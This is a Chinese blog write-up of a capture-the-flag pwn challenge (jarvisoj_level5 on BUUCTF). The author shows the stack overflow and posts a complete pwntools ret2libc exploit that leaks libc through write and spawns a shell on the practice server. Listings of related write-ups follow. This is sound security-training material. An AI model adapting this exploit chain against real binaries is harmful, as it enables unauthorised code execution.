jarvisoj_level5

于 2023-02-28 15:06:51 发布
阅读量79 收藏 1
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129262098
版权

jarvisoj_level5

写在前面:虽然buu上面标的是level5 但是实际给的文件是leval3_x64因此只是个简单的return2lbc3

惯例先checksec一下

请添加图片描述

只开启了NX保护 放进ida64里看看

没啥营养的main函数

请添加图片描述

进vuln函数看看

请添加图片描述

一个很明显的栈溢出

看一眼字符表 没有system和“/bin/sh”看来大概是一道简单的ret2libc3

那就直接贴exp了

from pwn import *
from LibcSearcher import *
io=remote('node4.buuoj.cn',25533)
elf=ELF('./level3_x64')
rdi=0x4006b3
rsi_r15=0x4006b1
ret=0x400499
write_plt=elf.plt['write']
write_got=elf.got['write']
main=0x40061a
io.recvuntil('Input:')
payload='a'*(0x80+8)+p64(rdi)+p64(1)
payload+=p64(rsi_r15)+p64(write_got)+p64(8)
payload+=p64(write_plt)
payload+=p64(main)
io.sendline(payload)
write_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
binsh=libc_base+libc.dump('str_bin_sh')
payload='a'*(0x80+8)+p64(ret)+p64(rdi)+p64(binsh)+p64(system_addr)
io.sendline(payload)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2031
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
JarvisOJ level5
PLpa的博客
07-11 399
题目要求不用system和execve函数,练习使用mmap和mprotect函数。 首先看一下mmap函数和mprotect函数有什么用。 mmap()函数 mmap将一个文件或者其它对象映射进内存。文件被映射到多个页上,如果文件的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。mmap在用户空间映射调用系统中作用很大。 头文件 <sys/mman.h> 函数原型 voi...
[BUUCTF]PWN——jarvisoj_level5
BangSen1的博客
03-27 181
jarvisoj_level5 例行检查,开启NX保护 IDA打开,找到主函数。buf很明显的溢出漏洞 56分49秒,采用ret2libc的方法,得用write函数来泄露libc。 from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',27018) elf=ELF('./level3_x64') main_addr=0x40061a pop_rdi=0x4006b3 pop_rsi_r15=0x4006b1 wri
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
1. “switching_angles_5_level.asv”、“switching_angles_5_level_final.asv”、“switching_angles_5_level_4_8_08.asv”、“switching_angles_5_level1.asv”:这些文件可能包含了不同版本的五电平逆变器开关角...
psm.rar_5 LEVEL_level inverter_psim
09-20
标题"psm.rar_5 LEVEL_level inverter_psim"指的是一个关于5级逆变器的仿真项目,其中"5_LEVEL"强调了其多电平特性,"level inverter"是5级逆变器的英文表述,而"psim"则表明这个项目是使用PSIM(Power System ...
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
CALIPSO_READERS_L2_Level2_5km_calipso_
10-02
标题“CALIPSO_READERS_L2_Level2_5km_calipso_”指的是NASA的CALIPSO(Cloud-Aerosol Lidar and Infrared Pathfinder Satellite Observation)卫星数据的第二级(Level 2)5公里分辨率的读取器。描述中提到的“nasa...
level_set_image.rar_level set_level set 方程
09-21
这个"level_set_image.rar_level set_level set 方程"的压缩包内容可能包含了一个名为"level_set_image.m"的MATLAB程序,用于演示或实现Level Set方法在图像处理中的应用。 Level Set方法的核心在于用一个标量函数...
jarvis oj level5
发蝴蝶和大脑斧的博客
12-11 930
level5要求不用system和execve,而是用mprotect和mmap,查了一下,mmap主要是将哪个文件映射到一段内存去同时设置那段内存的属性 可读可写或者是可执行,mprotect函数是将从addr开始的地址 ,长度位len的内存的访问权限。毫无头绪。查了网上大神的wp,才知道思路。 首先leak地址,shellcode写入bss没什么好说的。 要说下为什么要把bss和mprotec...
SyntaxError: return outside function
逐梦人.的博客
10-10 1908
这种语法错误一般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
jarvisoj pwn level5 wp
zszcr的博客
03-26 1957
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
jarvisoj level5爬坑
weixin_30512785的博客
11-12 158
本着纸上得来终觉浅,绝知此事要躬行的原则,把一个简单的ROP做了一下。漏洞很明显,libc有给出;唯一的限制就是不允许调用system或execve,而是用mprotect或者mmap 脚本调了半天,最后发现是shellcode的问题;这里边的一个坑是shellcraft.sh()要指定一个目标平台的架构,没用过shellcraft模块,连这么简单的错都犯,汗-_-|| from pwn ...
从BUUCTF之“jarvisoj_level5”中看如何暗度陈仓实现“mprotect”修改.bss段为可执行
Probeginner的博客
12-10 660
mprotect修改权限实践
[XMAN]level5 Jarvis OJ
九层台
07-10 1092
思路:bss段刚开始是不可执行的,从通用的想要执行bss必须执行mprotect函数来更改bss段的权限(改为7即可读可写可执行)。但是想要获取到mprotect函数必须获取到libc版本。还是少不了上次的泄露libc函数,这里泄露的时候也直接用通用gedit减少不必要的操作,减少错误。 泄露获取libc–&amp;gt;获取到mprotect函数来改写bss段的权限–&amp;gt;把shellcode写入到...
18.9.25 Jarvis OJ PWN----[XMAN]level5
qq_42192672的博客
09-25 534
题目提示: 参考链接:https://veritas501.space/2017/03/10/JarvisOJ_WP/                   https://blog.csdn.net/github_36788573/article/details/80178146 mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8343
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值